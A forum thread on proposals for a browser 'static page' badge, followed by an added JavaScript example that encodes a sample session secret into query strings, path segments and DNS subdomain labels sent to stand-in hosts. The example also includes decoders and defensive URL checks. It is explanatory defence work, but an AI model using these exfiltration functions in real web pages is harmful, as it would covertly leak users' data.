by secureleaf 1805 days ago
This is a great idea but it would be difficult to implement. Sure, it would be easy to catch (and block) HTTP requests other than OPTIONS and GET.

But even a GET request can be used to send data. Just pack the data you want to send in the query string and voila.

2 comments

Just some JS call like "startStatic()". At that point, all network activity is shut down for good, and the page gets a badge.
So don’t allow GET with query params. You want the static moniker? It has to be static. No server interaction after load, and no sending any data during load.
You can still hide the data in "folders". /foo/bar/baz/buz can be totally dynamic on the server.
How about after load, that tab automatically goes completely offline. Users can manually do this in Chrome on a tab-by-tab basis by using the developer console and setting Throttling to "Offline".
That sounds more promising. The site might be able to store data and then send it the next time the page is loaded. I think at the end of the day, a malicious dev could probably find a workaround to most implementations. Might just be better to vet out sites and use reputation to state they are truly offline.
I hear what you're saying, but I also believe this to be a solvable problem.
Note that the "offline" mode in devtools doesn't kill any websocket connections. It may have other holes I'm not aware of also.
Or in the subdomain, using "DNS exfiltration": https://twitter.com/rsobers/status/1293539543115862016
That's an interesting exploit, thanks for sharing.
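The three GET-only channels raised in this thread, as an added example in working JavaScript (this is not code from the thread or from any commenter): the query string, path segments ("folders"), and DNS labels in the hostname, alongside the naive "no query params" check and a stricter check against a manifest of the exact URLs fetched during load. The origin static.example, the zone exfil.example, the sample secret and the manifest contents are all constructed for the example; the functions run under Node, which provides the global URL and Buffer.

```javascript
// Added example, not from the thread. Shows how a page that may only issue
// plain GET requests can still push bytes to a server, and which checks
// catch which channel. All names, hosts and the secret are constructed.

// Constructed sample of data a malicious page might want to leak.
const SECRET = 'session=abc123';

// (a) The obvious channel: the query string.
function exfilViaQuery(origin, data) {
  const u = new URL('/pixel.gif', origin);
  u.searchParams.set('d', Buffer.from(data).toString('hex'));
  return u.toString();
}

// (b) "Folders": the same bytes hidden in path segments, split into
//     fixed-size chunks so each segment looks like an ordinary folder name,
//     with a decoy filename at the end.
function exfilViaPath(origin, data, chunk = 8) {
  const hex = Buffer.from(data).toString('hex');
  const segs = hex.match(new RegExp(`.{1,${chunk}}`, 'g')) || [];
  return new URL('/' + segs.join('/') + '/logo.png', origin).toString();
}

// (c) DNS exfiltration: bytes packed into subdomain labels. The authoritative
//     resolver for the attacker's zone sees the query even if the HTTP
//     request itself is later refused. RFC 1035 limits: 63 bytes per label,
//     253 bytes for the whole name (hex keeps every label a valid name).
function exfilViaDns(zone, data) {
  const hex = Buffer.from(data).toString('hex');
  const labels = hex.match(/.{1,63}/g) || [];
  const host = [...labels, zone].join('.');
  if (host.length > 253) throw new Error('hostname too long; split across requests');
  return `https://${host}/`;
}

// Server side of (b): recover the bytes from the path that arrived.
function decodeFromPath(url) {
  const segs = new URL(url).pathname.split('/').filter(Boolean);
  segs.pop(); // drop the decoy filename
  return Buffer.from(segs.join(''), 'hex').toString();
}

// Server side of (c): recover the bytes from the queried name.
function decodeFromDns(url, zone) {
  const host = new URL(url).hostname;
  const hex = host.slice(0, host.length - zone.length - 1).split('.').join('');
  return Buffer.from(hex, 'hex').toString();
}

// The check proposed in the thread: reject GET requests carrying query params.
// Stops (a) only.
function naiveStaticCheck(url) {
  return new URL(url).search === '';
}

// Stricter check: after load, a request is allowed only if it has no query
// string and its origin + path exactly matches a resource fetched during
// load (the frozen manifest). Stops (a), (b) and (c) because the hidden
// bytes change the path or the hostname.
function manifestStaticCheck(url, manifest) {
  const u = new URL(url);
  return u.search === '' && manifest.has(u.origin + u.pathname);
}
```

A manifest of exact URLs is the smallest rule that closes all three channels at the URL level, but it only covers requests made after the freeze: data hidden in the URLs of the initial load, a WebSocket opened before the freeze, or bytes stored locally and sent on the next visit are outside its reach, which is the gap the thread's reputation argument points at.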